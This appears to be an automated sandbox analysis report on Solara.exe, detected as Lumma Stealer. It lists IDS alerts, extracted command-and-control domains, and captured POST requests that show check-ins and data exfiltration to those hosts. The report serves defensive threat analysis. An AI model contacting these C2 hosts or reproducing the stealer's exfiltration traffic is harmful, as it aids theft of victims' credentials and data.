Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov dword ptr [ebp-34h], edi	1_2_00420D85
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+752D80C8h]	1_2_00422E90
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0042BE90
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov esi, eax	1_2_00428EB0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov edx, ecx	1_2_00428EB0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then jmp eax	1_2_00428EB0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_00430FE2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.4:63554 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.4:53019 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.4:53173 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.4:62379 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.4:49731 -> 104.21.33.249:443
Source: Network traffic	Suricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.4:51372 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.4:50815 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.4:49523 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.4:49734 -> 104.21.30.221:443
Source: Network traffic	Suricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.4:59870 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.4:49735 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.4:49732 -> 104.21.77.78:443
Source: Network traffic	Suricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.4:49733 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.30.221:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49737 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.30.221:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49739 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.77.78:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.77.78:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.33.249:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.33.249:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.53.8:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: enlargkiw.sbs
Source: Malware configuration extractor	URLs: condifendteu.sbs
Source: Malware configuration extractor	URLs: resinedyw.sbs
Source: Malware configuration extractor	URLs: allocatinow.sbs
Source: Malware configuration extractor	URLs: explorationmsn.store
Source: Malware configuration extractor	URLs: vennurviot.sbs
Source: Malware configuration extractor	URLs: drawwyobstacw.sbs
Source: Malware configuration extractor	URLs: ehticsprocw.sbs
Source: Malware configuration extractor	URLs: mathcucom.sbs

Source: Joe Sandbox View	IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 104.21.33.249 104.21.33.249

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1253Host: sergei-esenin.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1091Host: sergei-esenin.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: sergei-esenin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=2d3fa37933740902881225c8; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 12 Oct 2024 23:33:10 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control> equals www.youtube.com (Youtube)
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: explorationmsn.store
Source: global traffic	DNS traffic detected: DNS query: mathcucom.sbs
Source: global traffic	DNS traffic detected: DNS query: allocatinow.sbs
Source: global traffic	DNS traffic detected: DNS query: enlargkiw.sbs
Source: global traffic	DNS traffic detected: DNS query: resinedyw.sbs
Source: global traffic	DNS traffic detected: DNS query: vennurviot.sbs
Source: global traffic	DNS traffic detected: DNS query: ehticsprocw.sbs
Source: global traffic	DNS traffic detected: DNS query: condifendteu.sbs
Source: global traffic	DNS traffic detected: DNS query: drawwyobstacw.sbs
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs

Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic2~
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.a
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akam0
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: Solara.exe, 00000001.00000003.1827882998.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1821266637.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828891026.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/pu
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PA
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=engliO
Source: Solara.exe, 00000001.00000003.1827882998.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1821266637.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828891026.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
